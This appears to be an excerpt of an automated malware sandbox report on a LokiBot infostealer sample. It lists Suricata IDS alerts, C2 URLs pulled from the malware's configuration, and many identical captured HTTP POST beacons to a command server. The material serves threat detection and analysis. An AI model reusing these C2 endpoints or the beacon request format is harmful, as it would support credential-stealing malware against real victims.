                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50096 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50097 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50097 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50089
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49858 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50021
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49851 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50078
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49851 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50050 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49858 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49991 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49910
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49858 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49851 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49991 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49858 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50085
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50088 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50098 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50098 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50088 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49777 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50088 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49777 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50014 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50014 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50090 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49777 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50027 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50088 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50014 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49851 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50090 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50090 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49851 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50096
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49991 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50027 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49991 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49858
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50098 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49747
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50097
                      Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                      Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                      Source: Joe Sandbox ViewIP Address: 94.156.177.220 94.156.177.220
                      Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
                      Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
